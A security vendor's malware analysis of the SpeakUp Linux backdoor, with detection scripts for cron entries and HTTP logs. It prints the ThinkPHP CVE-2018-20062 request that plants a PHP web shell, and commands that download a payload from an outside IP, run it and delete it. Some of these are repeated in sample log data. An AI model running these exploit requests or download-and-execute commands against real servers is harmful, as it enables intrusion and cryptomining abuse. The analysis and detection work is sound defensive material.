SpeakUp Linux Backdoor

Ransomware | LewisR | April 24, 2019

Background

The new Trojan, named "SpeakUp" after one of its command-and-control (C&C) server names, exploits known vulnerabilities in six different Linux distributions. The attack is gaining momentum and is targeting servers in East Asia and Latin America, including AWS-hosted machines.

SpeakUp propagates within the infected subnet and beyond it to new IP ranges by exploiting remote code execution vulnerabilities. It also has the ability to infect Mac devices with the same undetected backdoor.

While the exact identity of the threat actor behind this new attack is still unconfirmed, cyberwatch365 researchers were able to correlate SpeakUp's author with a malware developer operating under the name Zettabit. Although SpeakUp is implemented differently, it has a lot in common with Zettabit's craftsmanship.

Infection Vector

The initial infection vector targets a recently reported vulnerability in ThinkPHP and uses command injection to drop a PHP web shell, which is then used to fetch and execute a Perl backdoor.

The exploitation is issued in three steps:

  1. Exploiting CVE-2018-20062 to upload a PHP shell

The ThinkPHP remote command execution vulnerability (CVE-2018-20062) is triggered with a single GET request to the targeted server, carrying the following query string:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET['module'];system($action);? ^>>index.php

The echo appends a minimal PHP web shell to index.php. From then on, the shell executes whatever command is passed in the "module" query parameter.

  2. Serving the backdoor

A second HTTP request is sent to the targeted server with the following resource:

/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

This command, injected through the web shell, fetches the ibus payload and stores it as /tmp/e3ac24a0bcddfacd010a6c10f4a814bc.

  3. Launching the backdoor

Execution is triggered with a third HTTP request:

/?module=perl /tmp/e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

This runs the Perl script, waits two seconds, and then deletes the file from disk to remove evidence; the already-running Perl process is unaffected by the deletion.

 

Backdoor

The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9, 2019. At the time of writing, it had no detections on VirusTotal.

Figure 3: No detections for SpeakUp on VirusTotal

 

To hinder analysis by security researchers, the second-stage payload was encoded with salted base64, and the C&C communication is encoded with the same scheme.

The decoded data contains multiple C&C domains, IP addresses and other unique parameters, along with second-stage payloads and additional modules.
In the analysis below we walk through the malicious code and the functions and modules the Trojan runs on the victim's machine.

 

Victim Registration

SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C, the compromised website speakupomaha[.]com.
The first POST sends a victim ID and introductory information such as the version of the installed script (currently 1.0.4).
The first C&C response is "needrgr", which means the victim is new to the server and needs to register.
The Trojan then posts "full information" about the machine, gathered by running the following Linux commands:

  • uname (-r, -v, -m, -n, -a, -s)
  • whoami
  • ifconfig -a
  • arp -a
  • cat /proc/cpuinfo | grep -c "cpu family" 2>&1
  • who -b

Figure 1: The registration process and introductory commands

 

SpeakUp’s Main Functions

After registration is complete, SpeakUp polls its C&C for new tasks at a fixed "knock" interval.

The C&C can issue the following command types:

"newtask" - Execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.

"notask" - Sleep for 3 seconds and then ask for another command.

"newerconfig" - Update the downloaded miner configuration file.

SpeakUp persists through cron and uses an internal mutex so that only one instance is alive at any time.
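The article states that persistence relies on cron but does not show the entry itself. The following Python script is an added example (not code from the article or from the malware author) of the check a responder would run over crontab contents: it flags entries matching the dropper chain described under Infection Vector, namely an interpreter launched from a temp directory, a 32-hex-character filename under /tmp, and a downloader fetching from a bare IP address. Those patterns are assumptions about what such an entry would look like, and the crontab text is constructed for the example.

```python
"""Flag cron entries that look like SpeakUp-style download-and-execute persistence.

Added example, not code from the article or from the malware author. The
article only says SpeakUp persists via cron; the patterns below are assumptions
derived from the dropper chain (wget from a bare IP, a Perl script with a hex
name under /tmp). SAMPLE_CRONTAB is constructed.
"""
import re
import subprocess
from dataclasses import dataclass, field


@dataclass
class CronFinding:
    line: str
    reasons: list = field(default_factory=list)


# Assumed indicators (see module docstring), one compiled pattern each.
INTERPRETER_FROM_TMP = re.compile(r"\b(?:perl|python[23]?|sh|bash)\s+(?:/tmp|/var/tmp|/dev/shm)/")
HEX_TMP_NAME = re.compile(r"/(?:tmp|var/tmp|dev/shm)/[0-9a-f]{32}\b")
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b.*https?://")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}[/:]")
ENV_ASSIGNMENT = re.compile(r"^\w+=")


def inspect_crontab(text):
    """Return a CronFinding for every non-comment entry that trips at least one pattern."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue  # blank, comment, or a MAILTO=/PATH= style variable
        reasons = []
        if INTERPRETER_FROM_TMP.search(line):
            reasons.append("interpreter run from world-writable dir")
        if HEX_TMP_NAME.search(line):
            reasons.append("32-hex-char filename in temp dir")
        if DOWNLOADER.search(line):
            reasons.append("downloader in cron command")
        if BARE_IP_URL.search(line):
            reasons.append("URL with bare IP address")
        if reasons:
            findings.append(CronFinding(line, reasons))
    return findings


def inspect_user_crontab(user):
    """Run `crontab -l -u <user>` (needs root) and inspect it; empty if the user has no crontab."""
    proc = subprocess.run(["crontab", "-l", "-u", user], capture_output=True, text=True)
    return inspect_crontab(proc.stdout) if proc.returncode == 0 else []


# Constructed sample: one benign job, then two that mirror the SpeakUp dropper chain.
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * wget -q http://67.209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
@reboot perl /tmp/e3ac24a0bcddfacd010a6c10f4a814bc >/dev/null 2>&1
"""


if __name__ == "__main__":
    for finding in inspect_crontab(SAMPLE_CRONTAB):
        print(finding.line)
        for reason in finding.reasons:
            print("   -", reason)
```

On a live host, feed it every user's crontab plus the files under /etc/cron.d and /etc/crontab; system crontab lines carry an extra user field after the schedule, which these patterns ignore because they only look at the command text. The mutex the article mentions means a second copy will not start, so a hit here is evidence of the foothold even if no second process is visible.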

 

Post-Infection Traffic

Once the victim is registered successfully, the C&C begins sending new tasks. Most of them manipulate the machine to download and execute different files.

An interesting point is the User-Agents in use. SpeakUp defines three User-Agents that the infected machine must use in every communication with its C&C. Two of them are iPad (iOS 3.2.1) User-Agent strings and the third is a hashed string:

  • Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
  • Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
  • E9BC3BD76216AFA560BFB5ACAF5731A3

Figure 2: SpeakUp's requests are encoded with salted base64 and carry one of the unique User-Agents
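As an added example (not code from the article or from the malware author), the Python script below hunts for the indicators this page describes in HTTP logs written in the Apache/Squid "combined" format: the three-step ThinkPHP chain from the Infection Vector section, as the victim's web server would log it, and the mandatory User-Agents and C&C host listed above, as an egress proxy logging in the same format would record an outbound beacon. The indicator strings come from the page; the log-format regex, the indicator names and the sample log lines are assumptions made for the example.

```python
"""Hunt for SpeakUp indicators in HTTP logs (Apache/Squid "combined" format).

Added example, not code from the article or from the malware author. The
indicator strings come from the article; the log format regex, the indicator
names and the sample log lines are assumptions made for this example.
"""
import hashlib
import re
from urllib.parse import unquote_plus

# combined format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The three User-Agents the article says SpeakUp uses for every C&C exchange.
SPEAKUP_USER_AGENTS = {
    "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) "
    "AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD",
    "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) "
    "AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405",
    "E9BC3BD76216AFA560BFB5ACAF5731A3",
}
C2_HOST = "speakupomaha.com"  # compromised site used as the main C&C
# Steps 2 and 3 of the chain: a shell command smuggled in the dropped web shell's "module" parameter.
MODULE_PARAM = re.compile(r"(?:^|[?&])module=([^&]+)")


def parse_line(line):
    """Split one combined-format line into fields and percent-decode the request URL."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["url"] = parts[1] if len(parts) > 1 else ""
    rec["decoded"] = unquote_plus(rec["url"])
    return rec


def classify(rec):
    """Return the indicator names matched by one parsed record, in a fixed order."""
    hits = []
    decoded = rec["decoded"]
    low = decoded.lower()
    # Step 1: ThinkPHP RCE (CVE-2018-20062): invokefunction -> call_user_func_array -> system
    if "invokefunction" in low and "call_user_func_array" in low and "vars[0]=system" in low:
        hits.append("thinkphp-rce-cve-2018-20062")
    # ...used to echo a "<?php ... system($_GET[...]) ?>" one-liner into a .php file
    if re.search(r"<\?\s*php.*>\s*\S+\.php", low):
        hits.append("php-webshell-written")
    m = MODULE_PARAM.search(decoded)
    if m:
        cmd = m.group(1)
        hits.append("webshell-module-param")
        if re.search(r"\b(?:wget|curl)\b", cmd):
            hits.append("download-to-disk")
        if re.search(r"\b(?:perl|python|sh|bash)\s+/tmp/", cmd):
            hits.append("execute-from-tmp")
        if re.search(r"\brm\s+-\w+\s+/tmp/", cmd):
            hits.append("self-delete")
    # Beacons: one of the mandatory User-Agents, or any request to the C&C host.
    if rec["ua"] in SPEAKUP_USER_AGENTS:
        hits.append("speakup-user-agent")
    if C2_HOST in rec["url"].lower():
        hits.append("speakup-c2-host")
    return hits


def scan(lines):
    """Return (client host, [indicators]) for every line that matched at least one indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            hits = classify(rec)
            if hits:
                findings.append((rec["host"], hits))
    return findings


def hashed_ua_is_md5_of(word, hashed_ua="E9BC3BD76216AFA560BFB5ACAF5731A3"):
    """The article says the third User-Agent is md5('liteHTTP'); check it instead of assuming."""
    return hashlib.md5(word.encode()).hexdigest().lower() == hashed_ua.lower()


# Constructed sample: the three exploitation requests as the victim's web server would log them,
# one benign request, and one outbound beacon as an egress proxy logging in the same format would.
SAMPLE_LOG = r'''
198.51.100.7 - - [14/Jan/2019:10:21:03 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?%20php%20$action%20=%20$_GET['module'];system($action);?^%3E%3Eindex.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Jan/2019:10:21:05 +0000] "GET /?module=wget%20http://67.209.177.163/ibus%20-O%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Jan/2019:10:21:08 +0000] "GET /?module=perl%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc;sleep%202;rm%20-rf%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jan/2019:10:22:00 +0000] "GET /about.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/64.0"
10.0.0.12 - - [14/Jan/2019:10:25:00 +0000] "POST http://speakupomaha.com/ HTTP/1.1" 200 27 "-" "E9BC3BD76216AFA560BFB5ACAF5731A3"
'''

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_LOG.strip().splitlines()):
        print(host, ", ".join(hits))
    print("third UA is md5('liteHTTP'):", hashed_ua_is_md5_of("liteHTTP"))
```

Run it against a web server's access log to find the inbound chain and against a proxy log (Squid's built-in `combined` logformat produces the same layout) to find the beacons. Matching the full User-Agent strings is deliberately exact; the "Mobile/BADDAD" token and the bare MD5 string are the distinctive parts, and the second iPad string alone would also match legitimate old iOS clients, so treat a hit on it without the C&C host as weaker evidence.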

 

At the time of writing, SpeakUp serves XMRig miners to its infected servers. According to XMRHunter, the associated wallets hold a total of roughly 107 Monero.

Figure 3: SpeakUp receives additional commands to execute, this time in plain text.

 

Propagation

SpeakUp also equips its backdoors with a Python script named simply "i" (sic), which lets the backdoor scan for and infect more Linux servers within its internal and external subnets. Its main functions are:

  1. Brute-force logins to admin panels using a pre-defined list of usernames and passwords.
  2. Scan the network environment of the infected machine, checking for specific open ports on servers that share the same internal and external subnet mask (i.e. 255.255.0.0, a /16).
  3. Attempt to exploit the following remote code execution vulnerabilities on the targeted servers:

a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
b) CVE-2010-1871: JBoss Seam Framework remote code execution
c) JBoss AS 3/4/5/6: Remote Command Execution (exploit)
d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
f) Hadoop YARN ResourceManager – Command Execution (exploit)
g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Successful exploitation of any of these vulnerabilities deploys the same ibus script on the newly compromised server.

 

Attacker Identity and Leads

Ibus client for Unix OS

Inside the ibus script there is a short description of an IBus client for GNU Emacs. IBus is an open-source multilingual input framework for Linux and Unix systems. While it supports many languages that do not use the Latin alphabet, its main audience is Asian users. The description and the file name are the only elements linking SpeakUp to the IBus framework; the script's content has no similarity to it whatsoever.

This may imply a connection between SpeakUp and East Asia.


Unique User-Agents

The unique User-Agents used in the HTTP communication between SpeakUp and its C&C are a possible path to the identity of the threat actor behind this campaign.
The distinctive strings are "Mobile/BADDAD", "Mobile/7B405" and "E9BC3BD76216AFA560BFB5ACAF5731A3".

Interestingly, the last string turned out to be the MD5 hash of the word liteHTTP.

Googling liteHTTP leads to the liteHTTP GitHub project.

While liteHTTP is a C#-based bot that targets Windows clients, its modules are quite similar to those of the SpeakUp Trojan:

  • Download & execute
  • Startup (with persistence)
  • Collection of system information (OS, version, installed location, etc.)
  • Self-update
  • Uninstall

 

The author's Hack Forums profile suggests that the author of the SpeakUp backdoor is a Russian speaker, as many of the comments are written in that language. He also appears to be a botnet developer, offering recommendations and publishing his LiteHTTP bot, which has a well-designed GUI.

Another interesting thing to note is the use of the term "Knock" on several occasions in his posts. "Knock" also appears in several strings inside the code of SpeakUp.

Figure 4: LiteHTTP screenshots taken from the user's profile, in which the term "Knock" appears

 

Conclusion

SpeakUp's obfuscated payloads and propagation technique are, beyond any doubt, the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy a few miners. The threat actor behind this campaign can at any time deploy additional payloads, potentially more intrusive and offensive. The malware can scan the surrounding network of an infected server and distribute itself. This campaign, while still relatively new, can evolve into something bigger and potentially more harmful.

Indeed, the threat actor behind this campaign, ‘Zettabithf’ himself, provides some ‘words of wisdom’ in this respect:

 

 

Cyberwatch365 SaaS is an advanced threat prevention technology that protects your cloud infrastructure against threats, including new Trojans like 'SpeakUp'.

 

 
